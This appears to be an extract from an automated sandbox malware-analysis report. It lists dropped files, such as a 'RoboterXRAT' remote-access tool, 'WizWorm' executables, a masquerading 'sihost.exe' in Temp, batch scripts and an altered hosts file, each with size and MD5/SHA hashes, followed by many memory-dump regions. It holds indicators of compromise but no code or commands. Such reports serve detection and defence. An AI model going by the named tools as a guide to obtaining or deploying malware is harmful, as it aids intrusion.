276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\7GX8wCCp3hOw12i

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe

Filesize
8.2MB

MD5
2bcf4d81fc953d9abce674d4721633d4

SHA1
7310f555418c254aba6f520b2ee72fb7cebb8763

SHA256
5069ad2bcd0ef590b340cdd8be3f262c560faa17f8774664499cdf7d04cf9393

SHA512
7bfb72dd930f6346479a5e346ee817e7cecafca4ad5a4ee6a8e987c5278aa13813f3e17166d178ff957e1f23d2ecf63f01b62965e423b1d9a4be8d2b8be3b934

Download Submit
C:\Users\Admin\AppData\Local\Temp\UxjYABMq2bBR1Mu

Filesize
20KB

MD5
49693267e0adbcd119f9f5e02adf3a80

SHA1
3ba3d7f89b8ad195ca82c92737e960e1f2b349df

SHA256
d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

SHA512
b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\UxjYABMq2bBR1Mu

Filesize
20KB

MD5
a603e09d617fea7517059b4924b1df93

SHA1
31d66e1496e0229c6a312f8be05da3f813b3fa9e

SHA256
ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7

SHA512
eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe

Filesize
2.7MB

MD5
8a14259150f471ec328687c9bcedd5b1

SHA1
e8c2ae02e49c4b5d1eb8494410574ba7a5c61119

SHA256
6994b5ff8d1589088cac1984216f3d15bf42d8c04f27f2795a557565e2e94ed1

SHA512
a6d2466793a863b3b213900ec3d8b8066c409cb8b7a917bfe0c2c51f308afc94a7c08fe17d78d972f18bc0cdbef826af428250ae92007dedbbfbc85ec3d65bd5

Download Submit
C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe

Filesize
21.3MB

MD5
ad2f02cf9676881547f696f59d30a816

SHA1
8c7e3e9ce36fd74db6d725fe086ff693508ab10c

SHA256
40857dd4534f369a1b94e042f794c2d0b858bb856dcff16df61bb4b66df890e5

SHA512
bee0fc3646a4967eb363e671525659187561e2be63f295295ba5635f8a2aaea1867739bda06637447348ca254f270ad9a564e1c11b70995897e238b9f749e2c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zzlo5w11.j10.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bxVXmoUsNTRjPzi\Display\Display.png

Filesize
220KB

MD5
1a3674d95b2c6dae2ae3bd62168c52ac

SHA1
37876c7b56b35830be18b2847548426af80e9dc0

SHA256
ae7886f75c152d3407a3e55d9be130c4df6a5bb6a7215536917b4cef6a02fe8a

SHA512
d64cb3666e6daac445f092845a7cb2197f8d629c673516a80bbf0df3bcf1bb677b3749f370b1ed8e6e984b0a169246c8a38d5f51dbc5574a19a7f4ac492f60d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\cxc.bat

Filesize
259KB

MD5
4e949e2528cffcf3c51c0fb9185a3b4e

SHA1
c48dc3493e75bce32680fce6ec42b11bc5cfb8c9

SHA256
ecef254e99e36a376c8fdc4dfbb99c0593b4fd2270437df3821990021278ec0a

SHA512
284be4b7215b882bb55e7df727c16628a692ce8e0dc974220e7f9b542bef9fafbb20a7db41df176e4c52142035375048638476577c594ebb8392b24346f0e619

Download Submit
C:\Users\Admin\AppData\Local\Temp\lZMjiD1n4nbS1iV

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\AppData\Local\Temp\sihost.exe

Filesize
230KB

MD5
c44a5f5978d95c5f2267b24b29f0f512

SHA1
c9f4fd16130ed87437faa002138d36cbbfa06aaa

SHA256
55dd738b5ccada8533d959d0652cdd8f768cc183fa924424e310bb3d4d811a49

SHA512
46be2766736c4d0eb3a4a7a0b847b683fbb21747e64e4a967cf0b4798f77ecac8594f98f0b6f3d29c9f0d507bb711dee9cffabff21708357ba0a9dabf035b4fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpEDD1.tmp.bat

Filesize
153B

MD5
2b64b59c4bb7c0c317a82f36f5d4bdc1

SHA1
15dc80806f59d2067f2f27a4b89e9deda5428826

SHA256
13df3d579ac09baa3e9d7edde183ed06ba57e3f66f72c046f59f26545c648942

SHA512
332287763d238e1d5ee0b8b6b5913364bf60d23da6fbc3958208ae3c1b13c9000f6bcbe78fca388fca912de1e695c9d091fd274aaa90c730ba7c197246b3227c

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF61E.tmp.bat

Filesize
153B

MD5
269e0cf446bd0591df6d5555fc4088ed

SHA1
a4620a974bc7a4b84ae2f270199b8c5961a97e1e

SHA256
301fcfeec225ab0493111ddf84dcea2cb1dee78b53e572023b590d0977cc191f

SHA512
c2b2204a75471a34d6452b85df2f9cf4f10183261027f3e712ce0f77d503039091c6858de1e2ac6cbb7775ebd7dc9f7a52f3ebb55caa1bb1c23f11229e043542

Download Submit
C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe

Filesize
62KB

MD5
ef0f5b80b1c07d0154d1f2bcaf9657e7

SHA1
add9257d91fe87daafaae4282452ce455c5c1ea6

SHA256
747c00322e73a64cba552cd6a3bfd1d16f31dd0c10a83f1febedc6910743f742

SHA512
28ec5b367feb915feb6b66ea3131e689477fd2f847a49c2ba3d99687895fc56d56e575e2d59763f246cca41bbdf5fbabde7a777c4cdd94b9a6c79935061118dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe

Filesize
168KB

MD5
78fa179ebcbd001b575b3baa06ff3ab2

SHA1
ef24f4ffacf974b0d5e6a2cfb3859bff1bc73f9c

SHA256
5c9c8ee0fd56497f8d1662c9d9347211761e969ab2af67d2c02ccb8588519f6e

SHA512
72e0f82e5a88b67211ac94ab134a9675f8f5c9fff092d3c2ccb4bd970e3b43d4173ec6e4c464d09e9b5bd9055ab0d816ccf07285786a2296cb154860da8e2963

Download Submit
C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe

Filesize
161KB

MD5
a69c6e092d415063a9fb80f8fe4e3444

SHA1
8b26a0fd01b1e48f7110cffecf6bc3b9d0822e9a

SHA256
f7dd8d6299c108a3221c31bf33637f59f0e19703aaa88b1e3a4f1093e7209a5d

SHA512
4e69b49d65f68ff913afbc991f06509645ac69850182f557ca625ad5cf92832059ddadb4af547cfb4fd84c4b24cf55a1ce3d9d6d466112e9581908d4e4d2da38

Download Submit
C:\Users\Admin\Desktop\WizWorm V5\WizWorm V5.exe

Filesize
21.3MB

MD5
c831f8de57e6bc935d531d95999b7364

SHA1
a85f7c7946e458cf1ba64a233b3932cc314c9cad

SHA256
e1559165017c04cebc3d56bbb9cc7f5b7b18e520f2eec6f77484496e204a92ca

SHA512
1429f4700398b62d70dd51233d95b79aebc0e5a04aa31fea7304cee7b3f7723cd4f8d451945b088615f0f3f77777dfc3e4b8615ce51c42c247a9f392fe46749d

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
memory/228-5315-0x00000000008F0000-0x000000000112E000-memory.dmp

Filesize
8.2MB

Download
memory/612-457-0x000001A3C2BE0000-0x000001A3C2C0B000-memory.dmp

Filesize
172KB

Download
memory/612-456-0x000001A3C2BB0000-0x000001A3C2BD5000-memory.dmp

Filesize
148KB

Download
memory/612-458-0x00007FFD99BB0000-0x00007FFD99BC0000-memory.dmp

Filesize
64KB

Download
memory/672-462-0x00007FFD99BB0000-0x00007FFD99BC0000-memory.dmp

Filesize
64KB

Download
memory/672-461-0x0000019341F20000-0x0000019341F4B000-memory.dmp

Filesize
172KB

Download
memory/732-1207-0x00000245D6060000-0x00000245D60A0000-memory.dmp

Filesize
256KB

Download
memory/760-220-0x0000000005D20000-0x0000000005D86000-memory.dmp

Filesize
408KB

Download
memory/760-218-0x0000000005360000-0x0000000005382000-memory.dmp

Filesize
136KB

Download
memory/760-221-0x0000000005D90000-0x00000000060E4000-memory.dmp

Filesize
3.3MB

Download
memory/760-258-0x0000000007990000-0x000000000800A000-memory.dmp

Filesize
6.5MB

Download
memory/760-259-0x0000000006840000-0x000000000685A000-memory.dmp

Filesize
104KB

Download
memory/760-282-0x00000000081E0000-0x00000000083A2000-memory.dmp

Filesize
1.8MB

Download
memory/760-219-0x0000000005CB0000-0x0000000005D16000-memory.dmp

Filesize
408KB

Download
memory/760-212-0x0000000002A00000-0x0000000002A36000-memory.dmp

Filesize
216KB

Download
memory/760-215-0x0000000005610000-0x0000000005C38000-memory.dmp

Filesize
6.2MB

Download
memory/760-235-0x00000000063C0000-0x000000000640C000-memory.dmp

Filesize
304KB

Download
memory/760-234-0x0000000006330000-0x000000000634E000-memory.dmp

Filesize
120KB

Download
memory/940-1236-0x0000000000620000-0x0000000000E5E000-memory.dmp

Filesize
8.2MB

Download
memory/1020-470-0x000001DAB9240000-0x000001DAB926B000-memory.dmp

Filesize
172KB

Download
memory/1020-471-0x00007FFD99BB0000-0x00007FFD99BC0000-memory.dmp

Filesize
64KB

Download
memory/1068-2241-0x0000015E590C0000-0x0000015E59100000-memory.dmp

Filesize
256KB

Download
memory/1120-4382-0x0000000000390000-0x0000000000BCE000-memory.dmp

Filesize
8.2MB

Download
memory/1236-1198-0x0000000000770000-0x0000000000FAE000-memory.dmp

Filesize
8.2MB

Download
memory/1560-5320-0x000002547E4D0000-0x000002547E510000-memory.dmp

Filesize
256KB

Download
memory/1604-1340-0x000001BDAB8F0000-0x000001BDAB930000-memory.dmp

Filesize
256KB

Download
memory/1788-1799-0x0000016E379A0000-0x0000016E379E0000-memory.dmp

Filesize
256KB

Download
memory/1788-5040-0x0000021E27F70000-0x0000021E27FB0000-memory.dmp

Filesize
256KB

Download
memory/1812-417-0x00007FFDD9B30000-0x00007FFDD9D25000-memory.dmp

Filesize
2.0MB

Download
memory/1812-418-0x00007FFDD81A0000-0x00007FFDD825E000-memory.dmp

Filesize
760KB

Download
memory/1920-1151-0x0000017767D30000-0x0000017767D70000-memory.dmp

Filesize
256KB

Download
memory/1980-1385-0x000001BC75F60000-0x000001BC75FA0000-memory.dmp

Filesize
256KB

Download
memory/2168-3785-0x0000000000950000-0x000000000118E000-memory.dmp

Filesize
8.2MB

Download
memory/2408-3306-0x0000000000100000-0x000000000093E000-memory.dmp

Filesize
8.2MB

Download
memory/2508-1861-0x00000000003B0000-0x0000000000BEE000-memory.dmp

Filesize
8.2MB

Download
memory/2648-814-0x000002740CD00000-0x000002740CD40000-memory.dmp

Filesize
256KB

Download
memory/2712-2829-0x0000000000720000-0x0000000000F5E000-memory.dmp

Filesize
8.2MB

Download
memory/3000-178-0x000001D34CD70000-0x000001D34CD8E000-memory.dmp

Filesize
120KB

Download
memory/3000-177-0x000001D3656D0000-0x000001D365720000-memory.dmp

Filesize
320KB

Download
memory/3000-176-0x000001D365750000-0x000001D3657C6000-memory.dmp

Filesize
472KB

Download
memory/3000-351-0x000001D34CD90000-0x000001D34CD9A000-memory.dmp

Filesize
40KB

Download
memory/3000-352-0x000001D365720000-0x000001D365732000-memory.dmp

Filesize
72KB

Download
memory/3000-106-0x000001D34AFB0000-0x000001D34AFF0000-memory.dmp

Filesize
256KB

Download
memory/3232-1667-0x0000016E905C0000-0x0000016E90600000-memory.dmp

Filesize
256KB

Download
memory/3256-3341-0x000001E112210000-0x000001E112250000-memory.dmp

Filesize
256KB

Download
memory/3412-1642-0x00000000002D0000-0x0000000000B0E000-memory.dmp

Filesize
8.2MB

Download
memory/3576-43-0x0000000000B60000-0x00000000020B2000-memory.dmp

Filesize
21.3MB

Download
memory/3584-1125-0x00000000008F0000-0x000000000112E000-memory.dmp

Filesize
8.2MB

Download
memory/3852-2620-0x0000020E669F0000-0x0000020E66A30000-memory.dmp

Filesize
256KB

Download
memory/3896-376-0x0000000002900000-0x0000000002926000-memory.dmp

Filesize
152KB

Download
memory/3896-375-0x0000000000960000-0x0000000000994000-memory.dmp

Filesize
208KB

Download
memory/3944-78-0x000001AEFC8C0000-0x000001AEFC8C8000-memory.dmp

Filesize
32KB

Download
memory/3944-89-0x000001AEFCB70000-0x000001AEFCB7E000-memory.dmp

Filesize
56KB

Download
memory/3944-73-0x000001AEFC8D0000-0x000001AEFC8F2000-memory.dmp

Filesize
136KB

Download
memory/3944-79-0x000001AEFCB40000-0x000001AEFCB72000-memory.dmp

Filesize
200KB

Download
memory/4280-2975-0x0000029349270000-0x00000293492B0000-memory.dmp

Filesize
256KB

Download
memory/4336-2592-0x00000000005F0000-0x0000000000E2E000-memory.dmp

Filesize
8.2MB

Download
memory/4376-60-0x0000000000B80000-0x00000000013BE000-memory.dmp

Filesize
8.2MB

Download
memory/4432-2328-0x0000000000580000-0x0000000000DBE000-memory.dmp

Filesize
8.2MB

Download
memory/4548-885-0x000002669EFF0000-0x000002669F030000-memory.dmp

Filesize
256KB

Download
memory/4708-1532-0x000001EBCFF90000-0x000001EBCFFD0000-memory.dmp

Filesize
256KB

Download
memory/4780-30-0x0000000000CF0000-0x0000000002244000-memory.dmp

Filesize
21.3MB

Download
memory/4836-174-0x0000000004F10000-0x0000000004FAC000-memory.dmp

Filesize
624KB

Download
memory/4836-108-0x0000000000370000-0x000000000062A000-memory.dmp

Filesize
2.7MB

Download
memory/4844-1116-0x000001CFEE010000-0x000001CFEE050000-memory.dmp

Filesize
256KB

Download
memory/4852-1250-0x000002AE4C9D0000-0x000002AE4CA10000-memory.dmp

Filesize
256KB

Download
memory/5152-3178-0x0000000000BC0000-0x00000000013FE000-memory.dmp

Filesize
8.2MB

Download
memory/5164-2126-0x0000000000240000-0x0000000000A7E000-memory.dmp

Filesize
8.2MB

Download
memory/5196-4471-0x0000000000870000-0x00000000010AE000-memory.dmp

Filesize
8.2MB

Download
memory/5224-4777-0x0000000000A80000-0x00000000012BE000-memory.dmp

Filesize
8.2MB

Download
memory/5256-3069-0x000002C4F16D0000-0x000002C4F1710000-memory.dmp

Filesize
256KB

Download
memory/5264-410-0x0000000000270000-0x0000000000286000-memory.dmp

Filesize
88KB

Download
memory/5264-450-0x000000001B6A0000-0x000000001B6B4000-memory.dmp

Filesize
80KB

Download
memory/5376-2235-0x0000000000730000-0x0000000000F6E000-memory.dmp

Filesize
8.2MB

Download
memory/5388-5102-0x0000000000A10000-0x000000000124E000-memory.dmp

Filesize
8.2MB

Download
memory/5396-1869-0x00000234AA2E0000-0x00000234AA320000-memory.dmp

Filesize
256KB

Download
memory/5416-322-0x00000000080D0000-0x00000000085FC000-memory.dmp

Filesize
5.2MB

Download
memory/5416-339-0x0000000008BB0000-0x0000000009154000-memory.dmp

Filesize
5.6MB

Download
memory/5416-337-0x0000000007300000-0x0000000007396000-memory.dmp

Filesize
600KB

Download
memory/5416-338-0x00000000072A0000-0x00000000072C2000-memory.dmp

Filesize
136KB

Download
memory/5444-2712-0x000001B707D90000-0x000001B707DD0000-memory.dmp

Filesize
256KB

Download
memory/5456-5053-0x0000017F32790000-0x0000017F327D0000-memory.dmp

Filesize
256KB

Download
memory/5456-3060-0x0000000000F10000-0x000000000174E000-memory.dmp

Filesize
8.2MB

Download
memory/5496-1082-0x0000000000FB0000-0x00000000017EE000-memory.dmp

Filesize
8.2MB

Download
memory/5564-1511-0x00000000004E0000-0x0000000000D1E000-memory.dmp

Filesize
8.2MB

Download
memory/5588-1299-0x0000000000870000-0x00000000010AE000-memory.dmp

Filesize
8.2MB

Download
memory/5620-2341-0x0000026EA4D20000-0x0000026EA4D60000-memory.dmp

Filesize
256KB

Download
memory/5664-804-0x0000000000DD0000-0x000000000160E000-memory.dmp

Filesize
8.2MB

Download
memory/5724-3641-0x000001651B820000-0x000001651B860000-memory.dmp

Filesize
256KB

Download
memory/5752-4477-0x00000299519E0000-0x0000029951A20000-memory.dmp

Filesize
256KB

Download
memory/5764-2149-0x0000025A02DC0000-0x0000025A02E00000-memory.dmp

Filesize
256KB

Download
memory/5764-3433-0x000001C38F6A0000-0x000001C38F6E0000-memory.dmp

Filesize
256KB

Download
memory/5796-1073-0x00000120F7210000-0x00000120F721A000-memory.dmp

Filesize
40KB

Download
memory/5796-1072-0x00000120F7230000-0x00000120F724C000-memory.dmp

Filesize
112KB

Download
memory/5796-1074-0x00000120F7250000-0x00000120F7258000-memory.dmp

Filesize
32KB

Download
memory/5796-1075-0x00000120F7910000-0x00000120F791A000-memory.dmp

Filesize
40KB

Download
memory/5864-3426-0x0000000000090000-0x00000000008CE000-memory.dmp

Filesize
8.2MB

Download
memory/5916-2025-0x0000028379070000-0x00000283790B0000-memory.dmp

Filesize
256KB

Download
memory/5924-840-0x00000000001A0000-0x00000000009DE000-memory.dmp

Filesize
8.2MB

Download
memory/6004-2948-0x0000000000210000-0x0000000000A4E000-memory.dmp

Filesize
8.2MB

Download
memory/6040-453-0x00007FFDD81A0000-0x00007FFDD825E000-memory.dmp

Filesize
760KB

Download
memory/6040-452-0x00007FFDD9B30000-0x00007FFDD9D25000-memory.dmp

Filesize
2.0MB

Download
memory/6056-3333-0x0000000000E00000-0x000000000163E000-memory.dmp

Filesize
8.2MB

Download
memory/6132-3690-0x0000000000300000-0x0000000000B3E000-memory.dmp

Filesize
8.2MB

Download
memory/6140-1372-0x0000000000FC0000-0x00000000017FE000-memory.dmp

Filesize
8.2MB

Download